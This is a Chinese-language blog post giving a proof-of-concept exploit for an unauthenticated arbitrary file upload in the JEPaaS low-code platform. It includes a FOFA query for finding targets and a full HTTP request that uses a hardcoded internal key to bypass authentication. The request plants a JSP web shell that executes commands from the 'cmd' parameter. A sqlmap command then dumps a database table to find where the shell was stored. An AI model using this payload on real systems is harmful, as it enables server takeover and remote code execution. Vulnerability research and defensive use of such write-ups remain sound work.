Babing
Published on 2024-08-30 / 2 Visits
0
0

J29-2JEPaaS-低代码平台-任意文件上传

J29-2JEPaaS-低代码平台-任意文件上传

漏洞描述:

JEPaaS 低代码平台 document/file 接口处存在文件上传漏洞,未经身份验证的远程攻击者可利用内部默认的key参数绕过权限认证上传任意文件,在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。

网站图片:

网站图片

fofa语法:

icon_hash=“-999810473”

漏洞复现:

payload:

POST /je/document/file?bucket=webroot HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
internalRequestKey: schedule_898901212
Content-Type: multipart/form-data; boundary=----21909179191068471382830692394
Connection: close

------21909179191068471382830692394
Content-Disposition: form-data; name="files"; filename="rce.jsp"
Content-Type: image/jpeg

<% java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.println(new String(b,0,a));}out.print("</pre>");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
------21909179191068471382830692394--

效果图:
效果图
PS:文件上传后没有回显路径,需利用SQL注入 寻找上传路径,文件默认是上传至数据库: jepaas的 je_document_file表中(需根据实际环境调整)。
payload:

python3 sqlmap.py -r 注入数据包.txt --level 3 -D "jepaas" -T "je_document_file" --dump --fresh-queries

效果图:
效果图
RCE
效果图:
效果图


Comment